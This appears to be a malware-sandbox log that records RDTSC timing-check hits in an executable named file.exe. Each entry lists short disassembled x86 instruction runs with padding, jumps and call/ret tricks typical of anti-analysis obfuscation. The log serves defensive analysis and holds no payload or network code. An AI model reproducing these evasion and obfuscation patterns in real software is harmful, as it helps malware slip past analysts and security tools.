Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110070D second address: 110073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F5E907EB776h 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F5E907EB776h 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F5E907EB780h 0x0000001b jbe 00007F5E907EB776h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110073A second address: 1100740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110AA1D second address: 110AA2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 je 00007F5E907EB77Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112450 second address: 1112454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112454 second address: 1112461 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112461 second address: 11124A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E9072B896h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnl 00007F5E9072B8A8h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F5E9072B89Ch 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11124A2 second address: 11124A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11124A7 second address: 11124B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F5E9072B896h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1118939 second address: 1118962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB77Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jc 00007F5E907EB782h 0x00000012 jmp 00007F5E907EB77Ch 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DDEC6 second address: 10DDEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jg 00007F5E9072B896h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11184E3 second address: 11184FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F5E907EB77Ch 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F5E907EB776h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11184FF second address: 1118519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5E9072B8B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11187A2 second address: 11187AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11187AC second address: 11187B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11187B0 second address: 11187B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11187B6 second address: 11187D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5E9072B8A2h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B332 second address: 111B338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111B338 second address: 111B33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BB85 second address: 111BB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F5E907EB784h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BB95 second address: 111BBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E9072B896h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F5E9072B896h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBAD second address: 111BBB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBB1 second address: 111BBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBBA second address: 111BC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F5E907EB776h 0x00000014 popad 0x00000015 jmp 00007F5E907EB785h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F5E907EB783h 0x00000024 pop eax 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F5E907EB778h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f push 68421972h 0x00000044 pushad 0x00000045 js 00007F5E907EB77Ch 0x0000004b jns 00007F5E907EB776h 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C294 second address: 111C2BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F5E9072B8A9h 0x00000010 jp 00007F5E9072B896h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C82B second address: 111C84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E907EB77Eh 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F5E907EB784h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C84A second address: 111C84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C89D second address: 111C8D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E907EB77Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jns 00007F5E907EB778h 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b mov esi, dword ptr [ebp+122D37BEh] 0x00000021 sbb si, 951Ch 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F5E907EB776h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C8D6 second address: 111C8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111C8DC second address: 111C8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111DC9C second address: 111DCBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jno 00007F5E9072B896h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E9072B89Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111DBA5 second address: 111DBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111DCBC second address: 111DCC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111DBA9 second address: 111DBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111ECF8 second address: 111ECFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111ECFC second address: 111ED6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F5E907EB778h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov esi, 63DB2EC6h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F5E907EB778h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov dword ptr [ebp+124713C9h], edx 0x00000051 or dword ptr [ebp+122D2A07h], ecx 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jnl 00007F5E907EB776h 0x00000061 pushad 0x00000062 popad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111ED6D second address: 111ED73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7A1 second address: 111F7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7A5 second address: 111F7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7AB second address: 111F806 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E907EB778h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F5E907EB77Eh 0x00000013 jbe 00007F5E907EB778h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F5E907EB778h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push ebx 0x00000037 pop esi 0x00000038 mov dword ptr [ebp+122D26F4h], edi 0x0000003e push 00000000h 0x00000040 jl 00007F5E907EB779h 0x00000046 mov di, bx 0x00000049 push 00000000h 0x0000004b mov esi, 23C4B6B5h 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F806 second address: 111F822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F822 second address: 111F826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F826 second address: 111F82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120C69 second address: 1120C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120C6D second address: 1120C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120C86 second address: 1120C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120C90 second address: 1120CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F5E9072B898h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jnp 00007F5E9072B89Ch 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F5E9072B89Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120CE8 second address: 1120CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120CF2 second address: 1120CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112175A second address: 11217FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F5E907EB776h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007F5E907EB77Eh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F5E907EB778h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e pushad 0x0000002f ja 00007F5E907EB77Ch 0x00000035 mov cl, dl 0x00000037 popad 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+122D28A8h], ecx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F5E907EB778h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e jc 00007F5E907EB784h 0x00000064 jmp 00007F5E907EB77Eh 0x00000069 jg 00007F5E907EB778h 0x0000006f popad 0x00000070 push eax 0x00000071 jp 00007F5E907EB77Eh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1122214 second address: 112222D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F5E9072B89Bh 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121F8E second address: 1121F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112222D second address: 1122237 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E9072B89Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121F94 second address: 1121F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1127E89 second address: 1127E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1127E8D second address: 1127EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F5E907EB781h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1127EAB second address: 1127EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1128EE3 second address: 1128F98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5E907EB77Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F5E907EB780h 0x00000015 pop eax 0x00000016 jmp 00007F5E907EB77Ch 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F5E907EB778h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 call 00007F5E907EB789h 0x0000003c mov di, bx 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 jmp 00007F5E907EB787h 0x00000047 push 00000000h 0x00000049 jmp 00007F5E907EB77Dh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F5E907EB787h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1128F98 second address: 1128F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1128F9D second address: 1128FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A019 second address: 112A01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A01F second address: 112A023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A023 second address: 112A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a push 00000000h 0x0000000c mov ebx, dword ptr [ebp+122D38F2h] 0x00000012 push 00000000h 0x00000014 and edi, dword ptr [ebp+122D3341h] 0x0000001a xchg eax, esi 0x0000001b jo 00007F5E9072B89Eh 0x00000021 jne 00007F5E9072B898h 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A052 second address: 112A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C060 second address: 112C064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C064 second address: 112C0EE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5E907EB778h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F5E907EB77Bh 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 mov eax, dword ptr [ebp+12457542h] 0x00000037 add esi, dword ptr [ebp+122D1DE6h] 0x0000003d popad 0x0000003e jnp 00007F5E907EB77Bh 0x00000044 adc bx, CC19h 0x00000049 push 00000000h 0x0000004b jne 00007F5E907EB779h 0x00000051 xchg eax, esi 0x00000052 jp 00007F5E907EB78Eh 0x00000058 jmp 00007F5E907EB788h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C0EE second address: 112C0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E9072B896h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112D233 second address: 112D250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E907EB789h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F0C5 second address: 112F11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 jnl 00007F5E9072B89Ch 0x0000000d cld 0x0000000e push 00000000h 0x00000010 mov di, 2440h 0x00000014 push esi 0x00000015 sub edi, dword ptr [ebp+122D1DAAh] 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F5E9072B898h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5E9072B8A2h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F11D second address: 112F123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112E1DB second address: 112E27E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E9072B89Ch 0x0000000b popad 0x0000000c nop 0x0000000d or ebx, 6861D8F0h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a cmc 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 pushad 0x00000023 jmp 00007F5E9072B8A3h 0x00000028 sub esi, dword ptr [ebp+122D3896h] 0x0000002e popad 0x0000002f mov eax, dword ptr [ebp+122D1301h] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F5E9072B898h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f call 00007F5E9072B8A6h 0x00000054 mov dword ptr [ebp+122D259Bh], eax 0x0000005a pop ebx 0x0000005b push FFFFFFFFh 0x0000005d jl 00007F5E9072B89Ch 0x00000063 mov ebx, dword ptr [ebp+122D28D2h] 0x00000069 and di, 2CA8h 0x0000006e push eax 0x0000006f push edx 0x00000070 jbe 00007F5E9072B89Ch 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F2D0 second address: 112F2F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F5E907EB788h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11311BB second address: 11311C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F5E9072B896h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
